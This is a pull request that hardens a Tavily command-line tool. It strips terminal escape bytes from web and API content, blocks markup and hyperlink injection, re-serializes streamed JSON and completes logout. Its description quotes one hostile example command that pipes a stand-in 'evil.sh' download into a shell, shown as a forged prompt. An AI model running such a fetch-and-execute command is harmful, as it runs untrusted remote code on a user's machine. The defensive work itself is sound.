### PR TITLE
Security hardening before public release: terminal-escape injection, logout, dep floors

### DIFF
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -31,7 +31,7 @@ dependencies = [
     "click>=8.1.0",
     "rich>=13.0.0",
     "httpx>=0.27.0",
-    "requests>=2.32.2",
+    "requests>=2.32.4",
     "urllib3>=2.2.2",
     "certifi>=2024.7.4",
 ]

--- a/pyproject.toml
+++ b/pyproject.toml
@@ -31,6 +31,9 @@ dependencies = [
     "click>=8.1.0",
     "rich>=13.0.0",
     "httpx>=0.27.0",
+    "requests>=2.32.2",
+    "urllib3>=2.2.2",
+    "certifi>=2024.7.4",
 ]
 
 [project.urls]

--- a/tavily_cli/commands/research.py
+++ b/tavily_cli/commands/research.py
@@ -7,8 +7,9 @@ import sys
 import time
 
 import click
+from rich.markup import escape
 
-from tavily_cli.common import handle_api_error, json_option
+from tavily_cli.common import handle_api_error, json_option, sanitize_control
 
 
 class ResearchGroup(click.Group):
@@ -88,7 +89,7 @@ def _render_stream(stream_resp, *, output_file: str | None = None) -> None:
                     step = f"{name}: {args}" if args else name
                     if step != current_step:
                         current_step = step
-                        err_console.print(f"  [dim]{step}[/dim]")
+                        err_console.print(f"  [dim]{escape(sanitize_control(step))}[/dim]")
 
             if tool_calls.get("type") == "tool_response":
                 for tr in tool_calls.get("tool_response", []):
@@ -184,10 +185,24 @@ def run(
         try:
             stream_resp = client.research(**kwargs)
             if json_mode:
-                # JSON mode: dump raw SSE as-is.
+                # Re-serialize each SSE event as one JSON line (NDJSON) rather
+                # than forwarding raw SSE bytes: this keeps the output valid,
+                # machine-parseable JSON and lets json.dumps escape any control
+                # characters in server content (raw bytes would otherwise reach
+                # the terminal as escape sequences).
                 for chunk in stream_resp:
                     text = chunk.decode("utf-8") if isinstance(chunk, bytes) else chunk
-                    click.echo(text, nl=False)
+                    for line in text.splitlines():
+                        if not line.startswith("data:"):
+                            continue
+                        payload = line[5:].strip()
+                        if not payload:
+                            continue
+                        try:
+                            event = json.loads(payload)
+                        except (json.JSONDecodeError, TypeError):
+                            continue
+                        click.echo(json.dumps(event, ensure_ascii=False))
             else:
                 _render_stream(stream_resp, output_file=output_file)
         except Exception as e:
@@ -248,7 +263,7 @@ def run(
                 time.sleep(1)
                 elapsed += 1
             else:
-                err_console.print(f"[#FFC769]Timed out after {timeout}s. Resume with: tvly research poll {request_id}[/#FFC769]")
+                err_console.print(f"[#FFC769]Timed out after {timeout}s. Resume with: tvly research poll {escape(sanitize_control(request_id))}[/#FFC769]")
                 return
 
     print_research_result(response, json_mode=json_mode, output_file=output_file)
@@ -278,12 +293,13 @@ def status(ctx: click.Context, request_id: str, json_flag: bool) -> None:
         from tavily_cli.theme import console
         s = response.get("status", "unknown")
         status_style = {"completed": "#9BC0AE", "failed": "#FAA2FB"}.get(s, "#FFC769")
-        console.print(f"  [bold]Request:[/bold]  {request_id}")
-        console.print(f"  [bold]Status:[/bold]   [{status_style}]{s}[/{status_style}]")
+        safe_request_id = escape(sanitize_control(request_id))
+        console.print(f"  [bold]Request:[/bold]  {safe_request_id}")
+        console.print(f"  [bold]Status:[/bold]   [{status_style}]{escape(sanitize_control(s))}[/{status_style}]")
         if s == "completed":
-            console.print(f"  [dim]Run 'tvly research poll {request_id}' to view results.[/dim]")
+            console.print(f"  [dim]Run 'tvly research poll {safe_request_id}' to view results.[/dim]")
         elif s == "failed":
-            console.print(f"  [#FAA2FB]Error:[/#FAA2FB] {response.get('error', 'Unknown error')}")
+            console.print(f"  [#FAA2FB]Error:[/#FAA2FB] {escape(sanitize_control(response.get('error', 'Unknown error')))}")
 
 
 @research.command()
@@ -322,7 +338,7 @@ def poll(ctx: click.Context, request_id: str, poll_interval: int, timeout: int, 
         with err_console.status("", spinner="dots") as live:
             next_poll = 0
             while elapsed < timeout:
-                live.update(f"[#5CD9E6]Polling research {request_id[:8]}... {elapsed}s elapsed[/#5CD9E6]")
+                live.update(f"[#5CD9E6]Polling research {escape(sanitize_control(request_id[:8]))}... {elapsed}s elapsed[/#5CD9E6]")
                 if elapsed >= next_poll:
                     try:
                         response = client.get_research(request_id)

--- a/tavily_cli/common.py
+++ b/tavily_cli/common.py
@@ -118,7 +118,7 @@ def handle_api_error(e: Exception, json_mode: bool) -> None:
         if e.docs:
             docs = sanitize_control(e.docs)
             safe_docs = escape(docs)
-            if urlparse(docs).scheme in ("http", "https") and "[" not in docs and "]" not in docs:
+            if "[" not in docs and "]" not in docs and urlparse(docs).scheme in ("http", "https"):
                 err_console.print(f"  [dim]Docs:[/dim] [dim link={docs}]{safe_docs}[/dim link]")
             else:
                 err_console.print(f"  [dim]Docs:[/dim] {safe_docs}")

--- a/tavily_cli/common.py
+++ b/tavily_cli/common.py
@@ -4,12 +4,32 @@ from __future__ import annotations
 
 import json
 import functools
+import re
 
 import click
 
 from tavily import TavilyKeylessLimitError
 
 from tavily_cli.keyless import format_keyless_envelope_for_terminal
+
+
+# C0/C1 control and escape bytes, minus tab (\x09), newline (\x0a), and
+# carriage return (\x0d). Stripping these from server- and web-derived text
+# defeats ANSI/OSC terminal-escape injection (screen clears, cursor moves,
+# window-title and clipboard writes) before content reaches a terminal.
+_CONTROL_CHARS = re.compile(r"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f-\x9f]")
+
+
+def sanitize_control(value: object) -> str:
+    """Strip terminal control/escape bytes from untrusted content.
+
+    Rich does not sanitize raw escape sequences embedded in rendered strings
+    (verified against Markdown(), Text.append(), and f-string markup), so any
+    field that originates from the web, the API, or an MCP response must be
+    passed through this before it is printed.
+    """
+    text = value if isinstance(value, str) else str(value)
+    return _CONTROL_CHARS.sub("", text)
 
 
 class TavilyAPIError(Exception):
@@ -82,17 +102,28 @@ def handle_api_error(e: Exception, json_mode: bool) -> None:
         click.echo(json.dumps({"error": str(e)}))
         raise SystemExit(4)
 
+    from urllib.parse import urlparse
+
+    from rich.markup import escape
+
     from tavily_cli.theme import err_console
+
+    message = escape(sanitize_control(e))
 
     if isinstance(e, TavilyAPIError) and e.status in _LIMIT_STATUSES:
         err_console.print()
-        err_console.print(f"  [#FFC769]>[/#FFC769] {e}")
+        err_console.print(f"  [#FFC769]>[/#FFC769] {message}")
         err_console.print()
         err_console.print("  [dim]Upgrade your plan at[/dim] [#9BC0AE link=https://tavily.com]tavily.com[/#9BC0AE link]")
         if e.docs:
-            err_console.print(f"  [dim]Docs:[/dim] [dim link={e.docs}]{e.docs}[/dim link]")
+            docs = sanitize_control(e.docs)
+            safe_docs = escape(docs)
+            if urlparse(docs).scheme in ("http", "https") and "[" not in docs and "]" not in docs:
+                err_console.print(f"  [dim]Docs:[/dim] [dim link={docs}]{safe_docs}[/dim link]")
+            else:
+                err_console.print(f"  [dim]Docs:[/dim] {safe_docs}")
         err_console.print()
         raise SystemExit(3)
 
-    err_console.print(f"  [#FAA2FB]> Error:[/#FAA2FB] {e}")
+    err_console.print(f"  [#FAA2FB]> Error:[/#FAA2FB] {message}")
     raise SystemExit(4)

--- a/tavily_cli/config.py
+++ b/tavily_cli/config.py
@@ -66,6 +66,7 @@ def get_api_base_url() -> str | None:
 def clear_credentials() -> None:
     if CONFIG_FILE.exists():
         CONFIG_FILE.unlink()
+    _clear_mcp_tokens()
 
 
 def _decode_jwt_payload(token: str) -> dict | None:
@@ -86,19 +87,22 @@ def _decode_jwt_payload(token: str) -> dict | None:
         return None
 
 
+def _is_tavily_token(token: str) -> bool:
+    """Check if a JWT was issued by Tavily's MCP server (issuer claim only)."""
+    payload = _decode_jwt_payload(token)
+    return bool(payload and payload.get("iss") == "https://mcp.tavily.com/")
+
+
 def _is_valid_tavily_token(token: str) -> bool:
-    """Check if a JWT is a valid, non-expired Tavily token."""
+    """Check if a JWT is a Tavily-issued, non-expired token."""
     import time
 
+    if not _is_tavily_token(token):
+        return False
     payload = _decode_jwt_payload(token)
-    if not payload:
+    exp = payload.get("exp") if payload else None
+    if exp is not None and time.time() >= exp:
         return False
-    if payload.get("iss") != "https://mcp.tavily.com/":
-        return False
-    exp = payload.get("exp")
-    if exp is not None:
-        if time.time() >= exp:
-            return False
     return True
 
 
@@ -115,6 +119,28 @@ def _get_mcp_token() -> str | None:
         except (json.JSONDecodeError, OSError):
             continue
     return None
+
+
+def _clear_mcp_tokens() -> None:
+    """Remove Tavily OAuth tokens from ~/.mcp-auth so logout fully revokes access.
+
+    Scoped to Tavily-issued tokens (by JWT issuer) so other MCP tools that share
+    ~/.mcp-auth are left untouched, and removed regardless of expiry so no stale
+    Tavily token lingers after logout.
+    """
+    if not MCP_AUTH_DIR.is_dir():
+        return
+    for token_file in MCP_AUTH_DIR.rglob("*_tokens.json"):
+        try:
+            data = json.loads(token_file.read_text())
+        except (json.JSONDecodeError, OSError):
+            continue
+        token = data.get("access_token")
+        if token and _is_tavily_token(token):
+            try:
+                token_file.unlink()
+            except OSError:
+                pass
 
 
 def get_api_key() -> str | None:

--- a/tavily_cli/output.py
+++ b/tavily_cli/output.py
@@ -1,4 +1,12 @@
-"""Output formatting: Rich for humans, JSON for agents, -o for file output."""
+"""Output formatting: Rich for humans, JSON for agents, -o for file output.
+
+All human-readable rendering treats result fields (titles, URLs, snippets,
+answers, page content, source lists, error text) as untrusted: they originate
+from the web, the Tavily API, or an MCP response. Rich does not strip raw
+terminal escape sequences from rendered strings and parses ``[...]`` markup in
+plain strings, so every untrusted field is routed through ``sanitize_control``
+and rendered via ``Text``/validated links rather than markup-bearing f-strings.
+"""
 
 from __future__ import annotations
 
@@ -16,6 +24,8 @@ from rich.table import Table
 from rich.text import Text
 from rich.tree import Tree
 
+from tavily_cli.common import sanitize_control
+
 
 console = Console()
 err_console = Console(stderr=True)
@@ -24,6 +34,37 @@ err_console = Console(stderr=True)
 # ---------------------------------------------------------------------------
 # Helpers
 # ---------------------------------------------------------------------------
+
+def _safe_text(value: Any, *, style: str = "") -> Text:
+    """Build a Rich Text from untrusted content.
+
+    ``Text.append`` does not parse Rich markup and ``sanitize_control`` strips
+    terminal escape bytes, so attacker-controlled fields cannot inject markup,
+    fake hyperlinks, or ANSI/OSC control sequences.
+    """
+    return Text(sanitize_control(value), style=style)
+
+
+def _safe_link(url: Any, label: Any | None = None, *, style: str = "") -> Text:
+    """Render a possibly-attacker-controlled URL safely.
+
+    The clickable link is applied only for http/https schemes, and the target
+    is stripped of escape bytes, defeating OSC-8 hyperlink and Rich-markup link
+    injection (e.g. a URL that closes ``[link]`` and opens its own).
+    """
+    clean_url = sanitize_control(url)
+    display = sanitize_control(label) if label is not None else clean_url
+    text = Text(display, style=style)
+    try:
+        scheme = urlparse(clean_url).scheme
+    except ValueError:
+        # urlparse rejects some malformed (attacker-controlled) URLs, e.g.
+        # unbalanced brackets ("Invalid IPv6 URL"); render as plain text.
+        scheme = ""
+    if scheme in ("http", "https"):
+        text.stylize(f"link {clean_url}")
+    return text
+
 
 def _score_label(score: float | None) -> Text:
     """Return a styled relevance score label."""
@@ -56,7 +97,11 @@ def _domain(url: str) -> str:
 # ---------------------------------------------------------------------------
 
 def emit(data: Any, *, json_mode: bool, output_file: str | None = None, pretty: bool = False) -> None:
-    """Write JSON data to stdout (or a file). Used in --json mode."""
+    """Write JSON data to stdout (or a file). Used in --json mode.
+
+    json.dumps escapes control characters (incl. ESC) as \\uXXXX, so this path
+    is safe from terminal-escape injection without extra stripping.
+    """
     text = json.dumps(data, indent=2 if pretty else None, ensure_ascii=False)
     if output_file:
         with open(output_file, "w", encoding="utf-8") as f:
@@ -87,7 +132,7 @@ def print_search_results(data: dict, *, json_mode: bool, output_file: str | None
         console.print()
         console.print(f"  [#5CD9E6 bold]Answer[/#5CD9E6 bold]")
         console.print()
-        console.print(Markdown(answer), width=min(console.width, 100))
+        console.print(Markdown(sanitize_control(answer)), width=min(console.width, 100))
         console.print()
 
     if not results:
@@ -102,16 +147,22 @@ def print_search_results(data: dict, *, json_mode: bool, output_file: str | None
 
         header = Text()
         header.append(f"{i}. ", style="bold #8385F9")
-        header.append(title, style="bold")
+        header.append(sanitize_control(title), style="bold")
         header.append("  ")
         header.append_text(_score_label(score))
         console.print(header)
-        console.print(f"   [link={url}]{_domain(url)}[/link]", style="#FAA2FB")
+
+        domain_line = Text("   ")
+        domain_line.append_text(_safe_link(url, _domain(url), style="#FAA2FB"))
+        console.print(domain_line)
+
         if content:
             snippet = content[:300]
             if len(content) > 300:
                 snippet += "..."
-            console.print(f"   {snippet}", style="dim")
+            snippet_line = Text("   ")
+            snippet_line.append(sanitize_control(snippet), style="dim")
+            console.print(snippet_line)
         console.print()
 
     _footer("Search", len(results), "results", response_time)
@@ -122,9 +173,9 @@ def print_search_results(data: dict, *, json_mode: bool, output_file: str | None
         console.print(f"[bold]Images ({len(images)}):[/bold]")
         for img in images:
             if isinstance(img, dict):
-                console.print(f"  {img.get('url', img)}")
+                console.print(_safe_text(f"  {img.get('url', img)}"))
             else:
-                console.print(f"  {img}")
+                console.print(_safe_text(f"  {img}"))
 
 
 # ---------------------------------------------------------------------------
@@ -145,11 +196,15 @@ def print_extract_results(data: dict, *, json_mode: bool, output_file: str | Non
         char_count = len(raw) if raw else 0
 
         console.print()
-        console.print(f"  [#5CD9E6 bold]{url}[/#5CD9E6 bold]")
-        console.print(f"  [dim]{_domain(url)} ({char_count:,} chars)[/dim]")
+        url_line = Text("  ")
+        url_line.append(sanitize_control(url), style="#5CD9E6 bold")
+        console.print(url_line)
+        meta_line = Text("  ")
+        meta_line.append(f"{sanitize_control(_domain(url))} ({char_count:,} chars)", style="dim")
+        console.print(meta_line)
         console.print()
         if raw:
-            console.print(Markdown(raw[:3000]), width=min(console.width, 100))
+            console.print(Markdown(sanitize_control(raw[:3000])), width=min(console.width, 100))
         else:
             console.print("  [dim]No content[/dim]")
         console.print()
@@ -157,7 +212,10 @@ def print_extract_results(data: dict, *, json_mode: bool, output_file: str | Non
     if failed:
         console.print("[#FFC769]Failed extractions:[/#FFC769]")
         for f_item in failed:
-            console.print(f"  [#FAA2FB]x[/#FAA2FB] {f_item.get('url')}: {f_item.get('error')}")
+            line = Text("  ")
+            line.append("x ", style="#FAA2FB")
+            line.append(f"{sanitize_control(f_item.get('url'))}: {sanitize_control(f_item.get('error'))}")
+            console.print(line)
 
     response_time = data.get("response_time")
     _footer("Extract", len(results), f"extracted, {len(failed)} failed", response_time)
@@ -185,7 +243,7 @@ def print_crawl_results(
     results = data.get("results", [])
     base_url = data.get("base_url", "")
 
-    tree = Tree(f"[bold]{base_url}[/bold]")
+    tree = Tree(_safe_text(base_url, style="bold"))
 
     # Group pages by path prefix for a hierarchical view
     for r in results:
@@ -201,14 +259,14 @@ def print_crawl_results(
             path = url
 
         label = Text()
-        label.append(path, style="#5CD9E6")
+        label.append(sanitize_control(path), style="#5CD9E6")
         label.append(f"  ({char_count:,} chars)", style="dim")
 
         node = tree.add(label)
         if raw:
             # First non-empty line as preview
             preview = raw.strip().split("\n")[0][:120]
-            node.add(Text(preview, style="dim"))
+            node.add(_safe_text(preview, style="dim"))
 
     console.print(tree)
 
@@ -254,9 +312,9 @@ def print_map_results(data: dict, *, json_mode: bool, output_file: str | None = 
     results = data.get("results", [])
     base_url = data.get("base_url", "")
 
-    tree = Tree(f"[bold]{base_url}[/bold]")
+    tree = Tree(_safe_text(base_url, style="bold"))
     for url in results:
-        tree.add(f"[link={url}]{url}[/link]")
+        tree.add(_safe_link(url))
 
     console.print(tree)
 
@@ -278,9 +336,15 @@ def print_research_result(data: dict, *, json_mode: bool, output_file: str | Non
     sources = data.get("sources", [])
 
     if status != "completed":
-        console.print(f"[bold]Status:[/bold] {status}")
+        status_line = Text()
+        status_line.append("Status: ", style="bold")
+        status_line.append(sanitize_control(status))
+        console.print(status_line)
         if data.get("error"):
-            console.print(f"[#FAA2FB]Error:[/#FAA2FB] {data['error']}")
+            error_line = Text()
+            error_line.append("Error: ", style="#FAA2FB")
+            error_line.append(sanitize_control(data["error"]))
+            console.print(error_line)
         return
 
     # Render the research report as markdown
@@ -288,7 +352,7 @@ def print_research_result(data: dict, *, json_mode: bool, output_file: str | Non
         console.print()
         console.print(f"  [#5CD9E6 bold]Research Report[/#5CD9E6 bold]")
         console.print()
-        console.print(Markdown(content), width=min(console.width, 100))
+        console.print(Markdown(sanitize_control(content)), width=min(console.width, 100))
 
     # Sources as a numbered table
     if sources:
@@ -301,7 +365,7 @@ def print_research_result(data: dict, *, json_mode: bool, output_file: str | Non
         for i, s in enumerate(sources, 1):
             title = s.get("title", "")
             url = s.get("url", "")
-            table.add_row(str(i), title, f"[link={url}]{url}[/link]")
+            table.add_row(str(i), _safe_text(title), _safe_link(url))
 
         console.print(table)
 

--- a/tavily_cli/repl.py
+++ b/tavily_cli/repl.py
@@ -129,7 +129,10 @@ def run_repl() -> None:
         try:
             args = shlex.split(line)
         except ValueError as e:
-            err_console.print(f"  [#FAA2FB]Parse error:[/#FAA2FB] {e}")
+            from rich.markup import escape
+
+            from tavily_cli.common import sanitize_control
+            err_console.print(f"  [#FAA2FB]Parse error:[/#FAA2FB] {escape(sanitize_control(e))}")
             continue
 
         # Strip leading "tvly" if user typed it out of habit.
@@ -153,8 +156,14 @@ def run_repl() -> None:
             err_console.print()
             err_console.print("  [dim]Cancelled.[/dim]")
         except click.exceptions.UsageError as e:
-            err_console.print(f"  [#FAA2FB]>[/#FAA2FB] {e.format_message()}")
+            from rich.markup import escape
+
+            from tavily_cli.common import sanitize_control
+            err_console.print(f"  [#FAA2FB]>[/#FAA2FB] {escape(sanitize_control(e.format_message()))}")
         except Exception as e:
-            err_console.print(f"  [#FAA2FB]> Error:[/#FAA2FB] {e}")
+            from rich.markup import escape
+
+            from tavily_cli.common import sanitize_control
+            err_console.print(f"  [#FAA2FB]> Error:[/#FAA2FB] {escape(sanitize_control(e))}")
 
         err_console.print()


### PR DESCRIPTION
Pre-public security assessment surfaced a cluster of issues in how the CLI renders attacker-controlled web content, plus a credential-lifecycle and a dependency gap. This PR fixes the five that should land before open-sourcing. No functional regression — verified against the live API (search/extract/research) and with a targeted attack-payload test suite.

## What & why

### 1. Terminal-escape (ANSI/OSC) injection — HIGH _(remote, no auth)_
`search` answers, `extract` page content, and `research` reports are attacker-controlled web content rendered via `rich.Markdown()`, which passes raw escape bytes straight to the terminal. A page Tavily indexes could clear the screen and print a forged `$ run: curl evil.sh | sh` prompt, spoof the window title, or write to the clipboard (OSC-52). `search` works keyless, so no API key is needed to be a victim.
**Fix:** new `common.sanitize_control()` strips C0/C1 control/escape bytes; applied to every web/API/MCP-derived field before rendering.

### 2. Rich-markup / OSC-8 hyperlink injection — MED _(remote)_
Result titles, URLs, snippets, source tables, and server error text were interpolated into markup-parsed f-strings (`[link={url}]…`), enabling fake clickable hyperlinks (visible text `trusted-bank.com` → attacker host) and styling spoofs; unbalanced markup also crashed rendering.
**Fix:** render untrusted fields via `rich.Text` (no markup parsing); clickable links applied only for validated `http`/`https` URLs, with `urlparse` guarded against malformed input.

### 3. `research --stream --json` raw SSE passthrough — MED
This path echoed raw server SSE bytes to stdout — not valid JSON for agents, and a raw escape-passthrough.
**Fix:** re-serialize each SSE event as one JSON line (NDJSON); `json.dumps` escapes control characters.

### 4. Incomplete logout — MED _(local / shared host)_
`tvly logout` removed only `~/.tavily/config.json`; OAuth tokens in `~/.mcp-auth` survived and `get_api_key()` re-discovered them, so the user stayed authenticated despite "Credentials cleared."
**Fix:** `clear_credentials()` now also removes Tavily-issued OAuth tokens, scoped by JWT issuer so other MCP tools sharing `~/.mcp-auth` are untouched.

### 5. Dependency CVE exposure — LOW
Bare `>=` floors permitted installing credential-leak-prone `requests`/`urllib3`/`certifi` versions (the SDK sends the API key in an `Authorization` header).
**Fix:** add security floors for those transitive deps that exclude the affected ranges. (Dependabot and vuln/secret scanning are handled automatically at the org level.)

## Verification
- Attack-payload suite: raw ANSI/OSC and markup/OSC-8 payloads in answer/title/url/content/error are neutralized; markup shown as inert literal text; logout removes the Tavily token and spares a non-Tavily one.
- Live API (search, `--json` search, extract, `research --stream --json`): renders correctly, JSON output valid, stream emits valid NDJSON.
- `pip install .` resolves cleanly with the new floors (`requests 2.34.2`, `urllib3 2.7.0`, `certifi 2026.5.20`); no new `ruff` errors vs `main`.
